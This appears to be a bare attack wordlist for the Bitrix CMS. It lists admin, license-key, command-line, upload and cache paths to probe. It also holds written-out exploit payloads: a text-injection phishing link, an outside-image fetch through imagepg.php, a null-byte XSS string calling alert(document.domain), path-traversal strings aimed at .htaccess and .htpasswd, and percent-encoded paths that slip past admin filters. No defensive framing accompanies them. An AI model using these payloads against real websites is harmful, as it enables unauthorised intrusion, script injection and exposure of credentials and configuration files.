/bitrix/
/bitrix/admin/
/bitrix/components/bitrix/desktop/admin_settings.php
/bitrix/components/bitrix/map.yandex.search/settings/settings.php
/bitrix/components/bitrix/player/player_playlist_edit.php
/bitrix/tools/autosave.php
/bitrix/tools/get_catalog_menu.php
/bitrix/tools/upload.php
/ololo/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/
/bitrix/components/bitrix/main.numerator.edit.sequence/slider.php
/bitrix/services/main/ajax.php
/bitrix/services/mobileapp/jn.php
/bitrix/modules/main/admin/php_command_line.php
/?USER_FIELD_MANAGER=1
/support/key_info.php
/bitrix/license_key.php
/local/
/upload/
/upload/tmp/
/bitrix/managed_cache/
/bitrix/admin/main_controller.php
/bitrix/admin/php_command_line.php
/bitrix/admin/restore_export.php
/bitrix/admin/tools_index.php
/bitrix/bitrix.php
/bitrix/modules/main/ajax_tools.php
/bitrix/php_interface/after_connect_d7.php
/bitrix/themes/.default/.description.php
/bitrix/components/bitrix/main.ui.selector/templates/.default/template.php
/bitrix/components/bitrix/forum.user.profile.edit/templates/.default/interface.php
/bitrix/components/bitrix/mobileapp.list/ajax.php?items[1][TITLE]=TEXT+INJECTION!+PLEASE+CLICK+HERE!&items[1][DETAIL_LINK]=http://google.com
/bitrix/tools/imagepg.php?img=//interesnyefakty.org/wp-content/uploads/chto-takoe-fishing.jpg
/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00'}};alert(document.domain);if(1){//
/.htaccess/приветики/../..////////////////////////////bitrix//////////////////////////////virtual_file_system.php//////////////////////////////x/..
/.htpasswd/пистолетики/../../../""""""""""""""""""""""""""""""/../bitrix/""""""""""""""""""""""""""""""/../virtual_file_system.php/""""""""""""""""""""""""""""""/../x/..
/%2e/%62%69%74%72%69%78/
/%2e/%62%69%74%72%69%78/%2e/%61%64%6d%69%6e/
